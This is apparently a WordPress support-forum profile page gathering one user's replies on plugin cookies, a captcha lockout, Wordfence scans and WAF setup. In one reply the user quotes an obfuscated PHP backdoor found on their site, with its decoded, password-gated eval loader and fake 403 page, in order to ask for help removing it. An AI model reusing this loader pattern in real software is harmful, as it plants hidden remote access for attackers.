zeno001

Ah. Solved it.

There is an interaction with the last WordPress 4.9.6 GDPR update that added the tick box “Save my name, email, and website in this browser for the next time I comment.”

If I tick that, SCE works exactly as it should.

Is that what you expect?

No, the usual box with the comment doesn’t appear. Just checked the cookies: when I submit a test comment, a cookie is set:

“Name SimpleCommentEditing1034743b52c0fdeac4efc1e586772720286ece
Value
_wpAjax3b52c0fdeac4efc1e586772720286eceaa2049b2682dbc4acb7a5ebb5693e9dc-1529854028
Host Only true
Path /
Secure false
HTTP Only false
Session false
Expiration Date 6/24/2018 16:32:11
Store Id 1”

If SCE uses AJAX, could it be the SSL Insecure Content Fixer need to be set to include AJAX calls? I have tried turning this off completely but no difference.

Thanks Joachim.

The way I’ve done it seems to work well but wanted to check I wasn’t doing anything stupid. If I have any issues, I’ll let you know and/or try your method!

Many thanks.

Thanks for that, mra13.

Many thanks. I could check for cookies myself, but that would need me to make a donation to see if any were set during or after payment.

Still building the site. Can you explain what the parameter is looking for?

Thanks for that.

I had renamed the captcha plugin directory to disable it so I could access my sites again. I can’t update the plugin because WordPress can’t find it but if I change the directory name back to ‘captcha’, I won’t be able to access the site to update the plugin.

I think the only way is to delete the plugin from the backend and reinstall – is this the best or only way to do it?

Thanks.

wfyann

Thanks. I’ll follow that procedure – or I may just wipe all the WP files and re-install (retaining the current database).

But if those files shouldn’t even be there (and I can see those directories are for js or css files, not php), can I just delete them rather than removing the rogue code? The only file that’s not obviously out of place is https.php in the wp-includes directory (and there is a http.php file already there).

Actually, thinking about it, it was a very small site anyway so I’ll just delete all the files and database and install from scratch and recreate it – it’ll be worth the effort.

Thanks for all your help.

• This reply was modified 7 years, 5 months ago by zeno001.

Just disabled high sensitivity and ran a new scan: the same files were reported.

I’m not sure when I enabled that option, but it certainly wasn’t in the past week or so.

Do you know what these files are? Are the (or were they) core WP files?

Just had a look at the first file – although it looks mostly OK and is commented, there is this in the middle:

function add_registered_taxonomy() {
global $transl_dictionary;
$transl_dictionary = create_function(‘$inp,$key’,”\44\163\151\144\40\75\40\44\137\120 ….. [a long line]
if (!function_exists(“O01100llO”)) {
function O01100llO(){global $transl_dictionary;return call_user_func($transl_dictionary,’fqOf%7bI%26%26fO … [a long line]
call_user_func(create_function(”,”\x65\x76\x61l(\x4F01100llO());”));
}
}

The long lines of encoded HTML entities decodes to this:

$sid = $_POST [“sid”]; if (md5($sid) !== ‘0eee3ac0553c3c1376fa2010d8e764f5’ ) return ‘print “<!DOCTYPE HTML PUBLIC \”-//IETF//DTD HTML 2.0//EN\”><HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY><H1>Forbidden</H1>You do not have permission to access this folder.<HR><ADDRESS>Click here to go to the home page</ADDRESS></BODY></HTML>”;’; $sid= crc32($sid) + $key; $inp = urldecode ($inp); $t = ”; $S =’!#$%&()*+,-./0123456789:;<=>\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_\'"abcdefghijklmnopqrstuvwxyz{|}~f^jAE]okI\'OzU[2&q1{3h5w_79″4p@6\s8?BgP>dFV=mD<TcS%Ze|r:lGK/uCy.Jx)HiQ! #$~(;Lt-R}Ma,NvW+Ynb*0X’; for ($i=0; $i<strlen($inp); $i++){ $c = substr($inp,$i,1); $n = strpos($S,$c,95)-95; $r = abs(fmod($sid+$i,95)); $r = $n-$r; if ($r<0) $r = $r+95; $c = substr($S, $r, 1); $t .= $c; } return $t;

To my untrained eye, this looks dodgy!

Any ideas?

Thanks, wfyann. I can’t be absolutely sure, but I don’t think I had previously ignored them. The new behaviour sound like it makes more sense!

Thanks.

And the same here. The code for this file on my website is identical to that in the current download of this plugin. The code looks suspicious because it’s unstructured but several of the plugin’s files are also done this way.

It would be good if the plugin’s author could confirm whether the code is correct or not.

Matt

That’s great. All done now and everything seems to be working OK.

Thanks for all your help.

Alan

Thanks, Matt.

Do I have to delete the Wordfence WAF lines in .htaccess AND in .user.ini (or delete it – it contains nothing else) in the root install, then configure (or re-configure) WAF in the install in the subdirectory?

Once that’s done, if I go back to the root directory install, will Wordfence ask me to configure it again or do I just reinstate the deleted lines in both files?

Richard

Great! Not sure how you tested it on my site, but I’ve updated to 1.5.2 and the banner is now at the top where it should be.

Thanks for all your help!

Updated to 1.5.1 and the link you gave shows 1.5.1, but I still have no idea what that is doing and the cookie bar is still at the bottom.

Should that have fixed the issue?

Thanks.